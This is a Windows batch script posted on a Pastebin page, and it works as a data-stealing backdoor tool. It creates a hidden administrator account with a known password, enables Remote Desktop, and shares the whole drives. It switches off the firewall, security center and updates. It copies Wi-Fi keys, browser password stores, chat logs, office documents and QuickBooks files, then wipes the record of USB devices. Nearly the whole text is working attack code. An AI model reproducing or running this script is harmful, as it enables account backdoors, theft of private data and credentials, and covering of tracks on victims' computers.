Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- echo. off
- if exist c:\killswitch.txt goto end
- if not exist ..\.\Documents\%computername% mkdir ..\.\Documents\%computername% >nul
- set infolog=>> ..\.\Documents\%computername%\%username%.txt
- :Sinfo
- if exist "..\system\Settings\sinfodis.set" goto :SRemoteinfo
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----System Info--- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo off
- echo Computer Name is: %computername% >> ..\.\Documents\%computername%\%username%.txt
- echo User Name: %username% >> ..\.\Documents\%computername%\%username%.txt
- echo The date and Time is: %date% %time% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+]name of the domain controller that validated the current logon session. >> ..\.\Documents\%computername%\%username%.txt
- echo %logonserver% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+]IP Routing tables and Gateway >> ..\.\Documents\%computername%\%username%.txt
- echo route pring >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] MAC Address >> ..\.\Documents\%computername%\%username%.txt
- echo getmac >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Operating System type. >> ..\.\Documents\%computername%\%username%.txt
- echo %OS% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+]Number of Processors Installed. >> ..\.\Documents\%computername%\%username%.txt
- echo %NUMBER_OF_PROCESSORS% >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] List of Administrators >> ..\.\Documents\%computername%\%username%.txt
- net localgroup administrators >> ..\.\Documents\%computername%\%username%.txt
- echo off
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Network adapters >> ..\.\Documents\%computername%\%username%.txt
- ipconfig /all >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Task List >> ..\.\Documents\%computername%\%username%.txt
- tasklist >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- :SRemoteInfo
- if exist "..\system\Settings\SremoteInfodis.set" goto :Suser
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo ----Remote info---- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo off
- echo [+] Arp Information >> ..\.\Documents\%computername%\%username%.txt
- arp -a >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Listed Domain Users >> ..\.\Documents\%computername%\%username%.txt
- net group >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Listed Local shares >> ..\.\Documents\%computername%\%username%.txt
- net share >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] List of Users >> ..\.\Documents\%computername%\%username%.txt
- net user >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Current Connected Users >> ..\.\Documents\%computername%\%username%.txt
- net use >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Listed Current Shares with ID Tags >> ..\.\Documents\%computername%\%username%.txt
- net view >> ..\.\Documents\%computername%\%username%.txt
- echo >> ..\.\Documents\%computername%\%username%.txt
- echo [+] Current Machines Connected >> ..\.\Documents\%computername%\%username%.txt
- nbtstat -n >> ..\.\Documents\%computername%\%username%.txt
- :Suser
- if exist "..\system\Settings\suserdis.set" goto :Huser
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Created System User----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- net user sysadmin admin /add /y >> ..\.\Documents\%computername%\%username%.txt
- net localgroup Administrators sysadmin /add /y >> ..\.\Documents\%computername%\%username%.txt
- echo Username: sysadmin >> ..\.\Documents\%computername%\%username%.txt
- echo Password: admin >> ..\.\Documents\%computername%\%username%.txt
- :Huser
- if exist "..\system\Settings\huserdis.set" goto :RDP
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----UserName Hidden From Welcome Screen----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sysadmin /t REG_DWORD /d 0 /f /y >> ..\.\Documents\%computername%\%username%.txt
- echo Done. >> ..\.\Documents\%computername%\%username%.txt
- :RDP
- if exist "..\system\Settings\RDPdis.set" goto :shares
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Enabled Remote Desktop----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 >> ..\.\Documents\%computername%\%username%.txt
- echo Done. >> ..\.\Documents\%computername%\%username%.txt
- :shares
- if exist "..\system\Settings\sharesdis.set" goto :registry
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Created System Shares----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- net share C=C: >> ..\.\Documents\%computername%\%username%.txt
- net share D=D: >> ..\.\Documents\%computername%\%username%.txt
- net share E=E: >> ..\.\Documents\%computername%\%username%.txt
- echo C: Created >> ..\.\Documents\%computername%\%username%.txt
- echo D: Created >> ..\.\Documents\%computername%\%username%.txt
- echo E: Created >> ..\.\Documents\%computername%\%username%.txt
- :Registry
- if exist "..\system\Settings\registrydis.set" goto :sysprotect
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registry Tweaks----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f
- echo +Disabled MS Updates Notifications >> ..\.\Documents\%computername%\%username%.txt
- echo +Disabled MS AntiVirus Notifications >> ..\.\Documents\%computername%\%username%.txt
- echo +Disabled MS Firewall Notifications >> ..\.\Documents\%computername%\%username%.txt
- echo +Disabled MS Firewall >> ..\.\Documents\%computername%\%username%.txt
- :Sysprotect
- if exist "..\system\Settings\sysprotectdis.set" goto :wifikey
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----System Protection Disabled----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- net stop "Automatic Updates" /y
- net stop "DefWatch" /y
- net stop "Microsoft Firewall" /y
- net stop "Windows Firewall/Internet Connection Sharing (ICS)" /y
- net stop "security center" /y
- netsh firewall set opmode disable
- sc config wscsvc start= disabled
- echo Disabled Services >> ..\.\Documents\%computername%\%username%.txt
- echo + MS Defender >> ..\.\Documents\%computername%\%username%.txt
- echo + Ms Firewall >> ..\.\Documents\%computername%\%username%.txt
- echo + Ms Security Center >> ..\.\Documents\%computername%\%username%.txt
- echo + MS Update >> ..\.\Documents\%computername%\%username%.txt
- :WiFiKey
- if exist "..\system\Settings\Wifikeydis.set" goto :ieurl
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Export Wireless Key----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- if not exist "..\.\Documents\%computername%\WifiKey" mkdir "..\.\documents\%computername%\WifiKey"
- ;XP
- reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces ..\.\documents\%computername%\wifikey\wifi.reg
- ;Vista/win7
- xcopy %programdata%\Microsoft\Wlansvc\Profiles\Interfaces ..\.\documents\%computername%\wifikey\ /E
- echo These Keys will be encrypted, use wifi program to decrypt once you have import to right areas >> ..\.\Documents\%computername%\%username%.txt
- ; .\Tools\wkv.exe /stext "%computername%_wk.log" >> ..\.\Documents\%computername%\%username%.txt
- ; copy %computername%.html+%computername%_wk.log* >> ..\.\Documents\%computername%\%username%.txt
- ; del /f /q "%computername%_wk.log" >nul
- :IEurl
- if exist "..\system\Settings\ieurldis.set" goto :iepw
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registery Dump on IE Typed URLs----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" >> ..\.\Documents\%computername%\%username%.txt
- :IEpw
- if exist "..\system\Settings\iepwdis.set" goto :startup
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registery Dump on IE Crypted Passwords----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKCU\Software\Microsoft\Internet Explorer\IntelliForms" >> ..\.\Documents\%computername%\%username%.txt
- echo Note: Create a reg Key With values and import to local machine then use software. >> ..\.\Documents\%computername%\%username%.txt
- :StartUp
- if exist "..\system\Settings\startupdis.set" goto :recent
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Registery Dump on Startups----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run >> ..\.\Documents\%computername%\%username%.txt
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce >> ..\.\Documents\%computername%\%username%.txt
- :Recent
- if exist "..\system\Settings\recentdis.set" goto :text
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Recently Opened Files----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- mkdir "..\.\Documents\%Computername%\Recently Opened"
- copy "%USERPROFILE%\Recent" "..\.\Documents\%Computername%\Recently Opened" /y
- echo Copied. >> ..\.\Documents\%computername%\%username%.txt
- echo Will not work on Win7. >> ..\.\Documents\%computername%\%username%.txt
- :Text
- if exist "..\system\Settings\indexdis.set" goto :index
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Text Documents----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- MkDir ..\.\Documents\%computername%\Files
- set Files="..\.\Documents\%computername%\Files\" /c /q /r /h /y /i
- set doc=If not Exist "%USERPROFILE%\My Documents\
- set desk=If not Exist "%USERPROFILE%\Desktop\
- xcopy "%USERPROFILE%\My Documents\*.txt" %files%
- xcopy "%USERPROFILE%\My Documents\*.doc" %files%
- xcopy "%USERPROFILE%\My Documents\*.wpd" %files%
- xcopy "%USERPROFILE%\My Documents\*.rtf" %files%
- xcopy "%USERPROFILE%\My Documents\*.xls" %files%
- xcopy "%USERPROFILE%\My Documents\*.docx" %files%
- xcopy "%USERPROFILE%\My Documents\*.ppt" %files%
- xcopy "%USERPROFILE%\My Documents\*.pptx" %files%
- xcopy "%USERPROFILE%\My Documents\*.mdb" %files%
- xcopy "%USERPROFILE%\My Documents\*.csv" %files%
- xcopy "%USERPROFILE%\My Documents\*.log" %files%
- xcopy "%USERPROFILE%\Desktop\*.txt" %files%
- xcopy "%USERPROFILE%\Desktop\*.doc" %files%
- xcopy "%USERPROFILE%\Desktop\*.wpd" %files%
- xcopy "%USERPROFILE%\Desktop\*.rtf" %files%
- xcopy "%USERPROFILE%\Desktop\*.xls" %files%
- xcopy "%USERPROFILE%\Desktop\*.docx" %files%
- xcopy "%USERPROFILE%\Desktop\*.ppt" %files%
- xcopy "%USERPROFILE%\Desktop\*.pptx" %files%
- xcopy "%USERPROFILE%\Desktop\*.mdb" %files%
- xcopy "%USERPROFILE%\Desktop\*.csv" %files%
- %desk%*.txt" (echo Text Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Text Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.doc" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.wpd" (echo WordPad Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo WordPad Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.rtf" (echo Rich Text File Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Rich Text File Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.xls" (echo Microsoft Excel Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Excel Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.docx" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.ppt" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.pptx" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.mdb" (echo Microsoft Access Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Access Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.csv" (echo comma-separated value Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo comma-separated value Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- %desk%*.log" (echo Log Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Log Files Found. >> ..\.\Documents\%computername%\%username%.txt)
- :index
- if exist "..\system\Settings\indexdis.set" goto :iefavs
- if not exist "..\.\Documents\%computer%\IEindex" mkdir "..\.\Documents\%computer%"
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump IE History index.dat File----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- ;Win7/Vista
- attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\index.dat" "..\.\Documents\%computer%\IEindex\index1.dat'
- attrib -a -r -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\Low\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\Low\index.dat" "..\.\Documents\%computer%\IEindex\index2.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index3.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\Low\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\Low\index.dat" "..\.\Documents\%computer%\IEindex\index4.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index7.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat"
- copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index8.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\index.dat" "..\.\Documents\%computer%\IEindex\index9.dat"
- attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat"
- copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat" "..\.\Documents\%computer%\IEindex\index0.dat"
- ;WinXP/2000
- attrib -r -a -s -h "%userprofile%\Cookies\index.dat"
- copy /Y "%userprofile%\Cookies\index.dat" "..\.\Documents\%computername%\index1.dat"
- attrib -r -a -s -h %userprofile%\Local Settings\History\History.IE5\index.dat"
- copy /Y "%userprofile%\Local Settings\History\History.IE5\index.dat" "..\.\Documents\%computername%\index2.dat"
- attrib -r -a -s -h %userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat"
- copy /Y "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computername%\index4.dat"
- attrib -r -a -s -h "%userprofile%\UserData\index.dat"
- copy /Y "%userprofile%\UserData\index.dat" "..\.\Documents\%computername%\index5.dat"
- :IEfavs
- if exist "..\system\Settings\iefavsdis.set" goto :chat
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Internet Explorer Favorites----- >> ..\.\Documents\%computername%\%username%.txt
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- set interb="..\.\Documents\%computername%\InternetBroswers
- if exist "%APPDATA%\Mozilla\Firefox\*" mkdir "%interb%\FireFox" && echo FireFox Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\Thunderbird\*" mkdir "%interb%\Thunderbird" && echo Thunderbird Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\netscape\NSB\*" mkdir "%interb%\netScape" && echo netScape Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\Opera\Opera\*" mkdir "%interb%\Opera" && echo Opera Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%USERPROFILE%\Favorites\*" mkdir "%interb%\IExplorer\" && echo MS IE Found. >> ..\.\Documents\%computername%\%username%.txt
- xcopy "%USERPROFILE%\Favorites\*" "%interb%\IExplorer\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\netscape\NSB\Profiles\*.db" "%interb%\netScape\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\netscape\NSB\Profiles\*.dat" "%interb%\netScape\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\netscape\NSB\Profiles\*bookmarks.html" "%interb%\netScape\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Opera\Opera\profile\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Opera\Opera\mail\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Opera\Opera\mail\*.ini" "%interb%\Opera\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*signons*" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*.txt" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.html" "%interb%\FireFox" /s /c /q /r /h /y /i
- xcopy "%APPDATA%\Thunderbird\Profiles\*" "%interb%\ThunderBird\*" /s /c /q /r /h /y /i
- :chat
- if exist "..\system\Settings\chatdis.set" goto :QB
- echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Chat Logs----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- set chatlog=..\.\Documents\%computername%\ChatLogs
- Mkdir %chatlog%
- if exist "%USERPROFILE%\My Documents\My Received Files\*" mkdir "%chatlog%\MSN" && echo MSN Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\Skype\*" mkdir "%chatlog%\Skype" && echo Skype Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%programfiles%\Trillian\*" mkdir "%chatlog%\Trillian" && echo Trillian Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%programfiles%\Yahoo!\Messenger\*" mkdir "%chatlog%\Yahoo*" && echo Yahoo Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%programfiles%\Miranda\*" mkdir "%chatlog%\Miranda" && echo Miranda Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\gaim\*" mkdir "%chatlog%\gaim" && echo Gaim Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%USERPROFILE%\My Documents\ICQ Lite\*" mkdir "%chatlog%\ICQ" && echo ICQ Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\*purple*" mkdir "%chatlog%\Pidgin" && echo Pidgin Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\MySpace*\IM\Logs\*" mkdir "%chatlog%\MySpace\" && echo MySpace Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\mIRC\logs\*.*" mkdir "%chatlog%\Mirc\" && echo Mirc found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%APPDATA%\xfire\*" mkdir "%chatlog%\xFire\" && echo xFire Found. >> ..\.\Documents\%computername%\%username%.txt
- if exist "%PROGRAMFILES%\AIM*" mkdir "%chatlog%\AIM\" && echo AIM found. >> ..\.\Documents\%computername%\%username%.txt
- xcopy "%USERPROFILE%\My Documents\My AIM Logs\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\JAMS\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\Mirc\logs\*.log" "%chatlog%\Mirc\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\MySpace*\IM\Logs\*" "%chatlog%\MySpace\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\Skype\*" "%chatlog%\Skype\*" /s /c /q /r /h /y
- xcopy "%programfiles%\Trillian\users\default\logs\*.log" "%chatlog%\Trilian\" /s /c /q /r /h /y
- xcopy "%programfiles%\Yahoo!\Messenger\Profiles\*" "%chatlog%\Yahoo!\" /s /c /q /r /h /y
- xcopy "%APPDATA%\Miranda\*" "%chatlog%\Miranda\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\*gaim\*.txt" "%chatlog%\Gaim\" /s /c /q /r /h /y
- xcopy "%APPDATA%\*gaim\*.xml" "%chatlog%\Gaim\" /s /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\ICQ Lite\*" "%chatlog%\ICQ\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\.purple\*" "%chatlog%\Pidgin\*" /s /c /q /r /h /y
- xcopy "%APPDATA%\Xfire\chatlog\*.*" "%Chatlog%\xfire\*.*" /s /c /q /r /h /y
- :QB
- if exist "..\system\Settings\QBdis.set" goto :noip
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Quick Books Files----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- if exist "%USERPROFILE%\My Documents\*.QB*" MkDir ..\.\Documents\%computername%\QuickBooks
- xcopy "%USERPROFILE%\My Documents\*.t05" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QDB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QDT" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBA" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBM" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBW" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBX" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- xcopy "%USERPROFILE%\My Documents\*.QBY" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
- :noip
- if exist "..\system\Settings\noipdis.set" goto :aim
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Registry/Logs Entry No-IP----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- mkdir "..\.\documents\%computername%\NoIP"
- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\" >> ..\.\Documents\noip\Import.reg
- xcopy "%ProgramFiles%\No-IP\*.log" "..\.\Documents\%computername%\NoIP\*.log" /c /q /r /h /y
- echo Use Import.reg and import into registry then startup no-ip program >> ..\.\Documents\noip\ReadMe.txt
- :aim
- if exist "..\system\Settings\aimdis.set" goto :googletalk
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Registry Entry AIM Encrypted ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords" >> ..\.\Documents\%computername%\%username%.txt
- echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
- :googletalk
- if exist "..\system\Settings\googletalkdis.set" goto :thumbs
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Registry Entry Google Talk ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg query "HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts" >> ..\.\Documents\%computername%\%username%.txt
- echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
- :thumbs
- if exist "..\system\settings\thumbsdis.set" goto :backdoor
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Dump Thumbs.db From MyDoc & Desktop ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- if exist "%userprofile%\My Documents\thumbs.db" mkdir ..\.\Documents\%computername%\Thumbs
- copy /Y "%userprofile%\My Documents\My Pictures\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyPictures.db"
- copy /Y "%userprofile%\My Documents\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyDocuments.db"
- copy /Y "%userprofile%\Desktop\thumbs.db" "..\.\Documents\%computername%\Thumbs\Desktop.db"
- echo note: You can view thumb nail size images of files in current dir by using a program >> ..\.\Documents\thumbs\Tip.txt
- if exist "..\system\settings\thumbsdis.set" goto :backdoor
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Delete USB plugin list ----- >> ..\.\Documents\%computername%\%username%.txt
- echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- reg Delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\ /va /f
- echo Deleted Recent USB list in registry.
- :backdoor
- if exist "..\system\Settings\backdoordis.set" goto :end
